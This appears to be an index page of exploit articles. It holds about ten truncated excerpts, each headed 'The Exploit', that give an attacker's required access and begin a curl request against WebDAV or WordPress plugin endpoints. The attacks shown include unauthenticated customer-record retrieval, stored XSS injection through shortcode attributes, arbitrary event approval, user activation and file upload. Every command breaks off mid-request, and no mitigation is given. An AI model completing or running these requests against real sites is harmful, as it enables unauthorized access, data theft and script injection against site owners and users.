## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...
## The Exploit Unauthenticated attackers can retrieve customer records by calling the exposed AJAX action with a valid publicly accessible nonce and a target email address. ```bash curl 'https://TARGET_DOMAIN/wp-admin/admin-ajax.php' \ ...
Read article →## The Exploit Attacker needs an authenticated WordPress account with Subscriber-level access or higher. ```bash curl 'https://target.example.com/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Co...
Read article →## The Exploit Requires an authenticated Administrator account. ```bash TARGET="https://target.example" COOKIE="wordpress_logged_in_abcd1234=..." curl -i -X POST "$TARGET/wp-admin/admin.php?page=church_admin_sermons&action=save" \ -H "...
Read article →## The Exploit A contributor-level WordPress user can store the XSS payload in the `cubewp_shortcode_taxonomy` shortcode `title` attribute. ```bash curl -i -X POST 'https://TARGET/wp-json/wp/v2/pages/123' \ -H 'Cookie: wordpress_logged_...
Read article →## The Exploit Unauthenticated attacker. ```bash curl -s -G 'https://TARGET/wp-json/cubewp-posts/v1/query-new' \ --data-urlencode 'paged=1' \ -H 'Accept: application/json' | jq '.posts[] | {ID, post_title, post_status, post_password}'...
Read article →## The Exploit An unauthenticated attacker can approve an arbitrary event by calling the plugin’s AJAX endpoint with `action=ajax_admin_event_approval`, `eventlist`, and a valid `event_approval_nonce`. ```bash curl -s "https://TARGET_HOST...
Read article →## The Exploit An authenticated attacker with Contributor-level access can inject a stored XSS payload into the `usp_access` shortcode `deny`/`content` attributes. ```bash curl -i -X POST 'https://TARGET/wp-json/wp/v2/posts' \ -H 'Autho...
Read article →## The Exploit No authenticated session is required beyond the public ticket/registration page nonce already available on the site. ```bash curl 'https://target.example/?wpas-do=mr_activate_user&user_id=1&_wpnonce=PUBLIC_WP_NONCE' \ -H ...
Read article →## The Exploit Requires authenticated author-level access or higher. ```bash curl -i -X POST "http://TARGET/wp-admin/admin-ajax.php" \ -H "Cookie: wordpress_logged_in_XXXXXXXXXXXXXXXXXXXXXXXX" \ -F "action=supreme_upload_json" \ -F ...
Read article →